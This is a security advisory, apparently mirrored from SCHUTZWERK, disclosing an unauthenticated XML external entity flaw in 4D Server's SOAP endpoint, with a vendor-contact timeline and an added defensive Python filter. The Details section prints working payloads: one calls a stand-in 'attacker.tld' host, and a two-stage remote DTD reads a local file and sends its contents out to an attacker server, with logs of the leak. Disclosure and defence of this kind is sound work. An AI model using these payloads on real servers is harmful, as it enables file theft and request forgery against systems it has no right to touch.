4D Server Server-Side Request Forgery / Arbitrary File Read

Published 18 May 2026 00:00:00. Reported by Marcelo Reyes. Type: packetstorm (packetstorm.news). 45 views.

Unauthenticated XML External Entity vulnerability in 4D Server SOAP endpoints allows arbitrary file read and server-side request forgery.

Related

- ATTACKERKB: CVE-2024-39847 (30 Apr 2026 07:10, attackerkb)
- CNNVD: 4D Server code issue vulnerability (30 Apr 2026 00:00, cnnvd)
- CVE: CVE-2024-39847 (30 Apr 2026 07:10, cve)
- Cvelist: CVE-2024-39847 Arbitrary File Read and Server Side Request Forgery via XML External Entities in 4D Server SOAP (30 Apr 2026 07:10, cvelist)
- EUVD: EUVD-2024-55562 (30 Apr 2026 07:10, euvd)
- NVD: CVE-2024-39847 (30 Apr 2026 07:16, nvd)
- Positive Technologies: PT-2026-36079 (30 Apr 2026 00:00, ptsecurity)
- RedhatCVE: CVE-2024-39847 (18 May 2026 01:57, redhatcve)
- Vulnrichment: CVE-2024-39847 Arbitrary File Read and Server Side Request Forgery via XML External Entities in 4D Server SOAP (30 Apr 2026 07:10, vulnrichment)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Arbitrary File Read and Server Side Request Forgery via XML External Entities in 4D Server SOAP
===============================================================================================

Unauthenticated attackers can exploit a weakness in the XML parser functionality of the SOAP endpoints in 4D Server. This allows them to obtain read access to files on the application server and adjacent network shares, and to perform HTTP GET requests to arbitrary services.

Metadata
========

- Affected product: 4D Server
- Affected version: v20 R3
- Vendor: 4D
- Problem type(s): CWE-611 Improper Restriction of XML External Entity Reference
- CVE ID: CVE-2024-39847
- CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-39847
- CVSS 4.0 score: 8.7
- Advisory URL: https://www.schutzwerk.com/en/blog/schutzwerk-sa-2024-002/

Details
=======

During a recent external penetration test, an application based on the 4D development platform[0] was examined. 4D Server is a component of the 4D suite, and acts as the database and application server, serving mobile and desktop clients. SCHUTZWERK identified an arbitrary file read vulnerability via XML external entities in the SOAP endpoint(s) of 4D Server.

Sending the following payload to the /4DSOAP endpoint showed that the application processes external XML entities, as requests were observed on the attack server:

<!DOCTYPE foo [
 <!ENTITY % test SYSTEM "http://attacker.tld">
 %test;
]>

After setting up a local 4D Server instance, SCHUTZWERK was able to confirm that the vulnerability is present in the latest version of 4D Server (20 R3 at the time of writing). Additionally, SCHUTZWERK found that the vulnerability is exploitable even if "Reject SOAP-Requests" is set in the 4D Server GUI.

Further testing revealed that a combination of error-based and out-of-band exfiltration techniques can be utilized to read arbitrary files on the application server's file system and adjacent network shares, as well as to perform HTTP requests to arbitrary URLs. This requires the use of a Document Type Definition (DTD) file loaded from an attacker-controlled server, and can be demonstrated using the following payloads:

Stage 1: XML body sent to the /4DSOAP endpoint

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % stage1 SYSTEM "http://192.168.56.1:2121/stage.dtd">
  %stage1;
]>

Stage 2: DTD file returned by http://192.168.56.1:2121/stage.dtd

<!ENTITY % fileb SYSTEM "file:///c:\Users\john.doe\Desktop\secret.txt">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM '%fileb;'>">
%eval;
%exfiltrate;

Server response for the request sent to the /4DSOAP endpoint:

<?xml version="1.0" encoding="UTF-8" ?>
<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP-ENV:Body>
        <SOAP-ENV:Fault>
                <faultcode>SOAP-ENV:Client</faultcode>
                <faultstring>error at line 6, column 1: invalid document structure
</faultstring>
        </SOAP-ENV:Fault>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Requests sent to the attacker-controlled server (192.168.56.1:2121):

192.168.56.114 - - "GET /stage.dtd HTTP/1.1" 200 -
192.168.56.114 - - "GET /my%20secret%20message%0D%0Ais%20super%20secret%0D%0Aand%20secure HTTP/1.1" 200 -

Depending on the file contents, HTTP requests for the exfiltrate entity may fail. On the local test instance of 4D Server (which was set up by creating a new, empty 4D application project), this was the case when requesting files containing a hash character (#). In this case, the file contents are instead returned as part of the /4DSOAP endpoint's response message:

<?xml version="1.0" encoding="UTF-8" ?>
<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP-ENV:Body>
        <SOAP-ENV:Fault>
                <faultcode>SOAP-ENV:Client</faultcode>
                <faultstring>error at line 5, column 13: unable to open external entity 'http://192.168.56.1:2121/# my secret website
- http:/secret.tld/bar'
</faultstring>
        </SOAP-ENV:Fault>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

For some file contents, exfiltration using these methods will not succeed. However, depending on the application, exfiltration could still be achieved utilizing application-specific SOAP functions accepting data tags.

The script 4d-xxe.py[1] was developed in order to aid in automated exploitation. It utilizes Flask[2] to start an exfiltration server on port 2121, and a query endpoint on port 1337. Once started, files can be requested by issuing a GET request to

http://127.0.0.1:1337/<target URI>

which will send the appropriate XML payload to obtain the specified resource:

$ curl '127.0.0.1:1337/http://192.168.56.114'
<?xml version="1.0" encoding="UTF-8" ?>
<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP-ENV:Body>
        <SOAP-ENV:Fault>
                <faultcode>SOAP-ENV:Client</faultcode>
                <faultstring>error at line 5, column 13: unable to connect socket for URL 'http://192.168.56.1:2121/<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
[...]
      <td class="grayborder">
        <h2 align="center">Welcome to your 4D Web Server default home
          page!</h2>
        <p align="center">This is the <strong><b>4D Web Server</b></strong>
          default home page. This <strong>test page</strong> is served by 4D
          Application.</p>
        <p align="center">If you are the webmaster, congratulations! Your Web
          server is up and running. You are seeing this page because you have
          not yet replaced the default "index.html" file with your actual
          home page.</p>
        <p align="center">Instructions for configuring your 4D Web
          Server can be found in the included documentation.</p>
        <p align="center"><b>IMPORTANT</b>: This Web page or Web site is neither
          owned nor administered by 4D SAS or any of its subsidiaries. Please contact
          the owner/webmaster of this site to report any problems with it.</p>
        <p align="center">&copy;1995-2024 4D, Inc., 4D SAS and its Licensors.<br>
          All rights reserved.</p>
       </td>
[...]
</html>
'
</faultstring>
</SOAP-ENV:Fault>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

This enables the use of any web directory enumeration tool to exfiltrate files and/or perform "proxied" HTTP requests.

Risk
====

An attacker can use the vulnerability to gather information and, depending on the stored data, exfiltrate secrets from the file system and adjacent SMB shares. Furthermore, HTTP requests can be used for out-of-band exfiltration and server-side request forgery (SSRF) attacks. Utilizing the SMB protocol could also lead to leakage of the user's NTLM or SSP hash.

Solution/Mitigation
===================

Update to 4D Server 20 R7 or higher.
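
Independent of the vendor update, the class of request shown in the Details section can be refused before it reaches the SOAP parser: SOAP 1.1 (section 3) and SOAP 1.2 (Part 1, section 5) both state that a SOAP message must not contain a Document Type Declaration, so any DOCTYPE in a request body is either malformed or hostile. The following Python gate is an added example written for this page; it is not SCHUTZWERK's 4d-xxe.py and not part of 4D Server. It uses the standard-library expat binding to reject DOCTYPE declarations, switch off parameter-entity processing (the stage-1 remote DTD load) and refuse external entity references (the stage-2 file and HTTP fetches). The sample request bodies are constructed for the example, and the DTD host dtd.example.invalid is a placeholder, not a real server.

```python
"""Pre-parse gate for SOAP request bodies: reject DTDs and external entities.

Added example for this page (not SCHUTZWERK's 4d-xxe.py and not 4D code).
SOAP 1.1 and 1.2 forbid a Document Type Declaration in a SOAP message, so a
reverse proxy or the endpoint itself can refuse any body that carries one
before a permissive XML parser ever sees it.
"""
import xml.parsers.expat as expat

# Constructed sample bodies. The first mirrors the shape of the advisory's
# stage-1 payload; "dtd.example.invalid" is a placeholder host, not a real one.
STAGE1_STYLE_PAYLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % stage1 SYSTEM "http://dtd.example.invalid/stage.dtd">
  %stage1;
]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"/>
"""

# Same payload without an encoding declaration, re-encoded as UTF-16 with a BOM.
# A byte-level search for "<!DOCTYPE" misses this; a real XML tokenizer does not.
STAGE1_STYLE_PAYLOAD_UTF16 = (
    STAGE1_STYLE_PAYLOAD.decode("utf-8")
    .replace(' encoding="UTF-8"', "")
    .encode("utf-16")
)

# Constructed benign request: no DTD, no entities, just an envelope with a body.
BENIGN_SOAP_REQUEST = b"""<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
  <SOAP-ENV:Body><GetStatus xmlns="urn:example:status"/></SOAP-ENV:Body>
</SOAP-ENV:Envelope>
"""


class DtdRejected(Exception):
    """Raised from inside the expat callback to abort on the first DOCTYPE."""


def naive_doctype_search(raw: bytes) -> bool:
    """The check a quick filter might use. Kept only to show its blind spot."""
    return b"<!DOCTYPE" in raw


def check_soap_body(raw: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for an inbound SOAP request body.

    The body is tokenized with the standard-library expat parser, which handles
    the BOM and declared encoding itself, so the DOCTYPE check cannot be evaded
    with UTF-16 or similar re-encodings. Three controls are applied:
      1. any DOCTYPE declaration aborts parsing (SOAP forbids DTDs anyway);
      2. parameter entities are never processed, so a remote DTD like the
         advisory's stage.dtd can never be fetched;
      3. external entity references are refused even if one slipped through.
    """
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(doctype_name, system_id, public_id, has_internal_subset):
        raise DtdRejected(
            f"DOCTYPE '{doctype_name}' is not allowed in a SOAP message"
            + (" (has internal subset)" if has_internal_subset else "")
        )

    def on_external_entity(context, base, system_id, public_id):
        # Returning 0 makes expat stop with an "external entity handling" error
        # instead of resolving system_id (a file:// or http:// URI).
        return 0

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity

    try:
        parser.Parse(raw, True)
    except DtdRejected as exc:
        return False, str(exc)
    except expat.ExpatError as exc:
        return False, f"malformed or unsafe XML: {exc}"
    return True, "ok"


if __name__ == "__main__":
    for name, body in [
        ("benign request", BENIGN_SOAP_REQUEST),
        ("stage-1 style payload", STAGE1_STYLE_PAYLOAD),
        ("stage-1 style payload, UTF-16", STAGE1_STYLE_PAYLOAD_UTF16),
    ]:
        print(f"{name:32s} naive_search={naive_doctype_search(body)!s:5s} "
              f"gate={check_soap_body(body)}")
```

Run stand-alone, the script prints a verdict for each constructed body: the benign envelope is accepted, both stage-1 style bodies are rejected for carrying a DOCTYPE, and the naive byte search reports False for the UTF-16 variant. That last result is why the check belongs in the XML tokenizer rather than in a substring match on the raw request, and why a gateway rule of this kind complements, rather than replaces, the 20 R7 update.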
    
Timeline
========

- 2024-06-17 Vulnerability discovered
- 2024-06-24 Attempt to contact vendor, no response received
- 2024-06-25 CVE ID requested
- 2024-06-29 CVE-2024-39847 assigned
- 2024-07-04 Attempt to contact vendor again, no response received
- 2024-07-09 Attempt to contact vendor again, no response received
- 2024-07-16 Attempt to contact vendor again, no response received
- 2024-07-22 Attempt to contact vendor again, no response received
- 2026-04-29 Advisory published

Credits
=======

The vulnerability was discovered by Marcelo Reyes of SCHUTZWERK GmbH.

Footnotes
=========

[0] https://4d.com
[1] https://www.schutzwerk.com/blog/schutzwerk-sa-2024-002/4d-xxe.py
[2] https://flask.palletsprojects.com/en/stable/
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmnyGKIaHGFkdmlzb3Jp
ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrs6TQ//Vp4Ts1sg8wUOx5V46ttU
OkErEUSrMqHDCrxiLKLsYoBBXyqPB+oKLzWFkMTUxbq+W7aqJIVG6EMeBsu1FCae
0JfGA0MYYJ4s7WcphN/QqqU+e35r0NfPAzcKlr861ZNcwcy9vbg/WP+z1AlTfH9X
MBKtv4Z2R1xpFq2sAJnwOw3E7Cl5g40PSsTJhI52/O7M4K5rB14EjFXW/hHgSFNz
ESUI+o/U1t7nPDulxfSsVmvbDTuvmxrs1xM/ulMYoKFKSueEglNCmF+5i/lFs7LF
rM0PZLGCbMR9z2NOeEk+dGwCztXpY2KN1KvPWYt4flvxZzlnWFWCzrVog8QdDhbV
CAfeLi+5krzgsZIPfphYpHc2BYJdAGsHDZx76GxoMNi8/miHX15+vg3N7SBPopOG
aIWnPJX0LCoecdzELJhzpOSYpzLTurRKnPU6y4sa/gJN4K99gCbE2HpPIJRaJmJG
hk7iwTUA11ijiEWpKCWX3hE3dhxY9WgKKoKe/CtGZkaEoEa1ePTPUFWhiwORpSsa
AV3i7YZOgjBiEj4ffBfy+Z/3fHhR7S3fWpFUhWeyb2jjx6OuJSG4g9az6Uze0hZG
vYn40CIpG2sHlm1PzQBzMUopqjmaW+FMyLgv8XOsnfdqg7UqPJ0LKmNAtafO1tVo
HH0qazSkyWNwZlaLr5YYUso=
=MhKk
-----END PGP SIGNATURE-----


-- 
SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany
Zertifiziert / Certified ISO 27001, 9001 and TISAX

Phone +49 731 977 191 0

[email protected] / www.schutzwerk.com

Geschäftsführer / Managing Directors:
Jakob Pietzka, Michael Schäfer

Amtsgericht Ulm / HRB 727391
Datenschutz / Data Protection www.schutzwerk.com/datenschutz

Vulners scoring (as shown on 18 May 2026 00:00, current)

- Vulners AI Score: 6 (medium risk)
- CVSS 3.1: 7.5
- CVSS 4.0: 8.7
- EPSS: 0.00447
- SSVC: not given
- Views: 45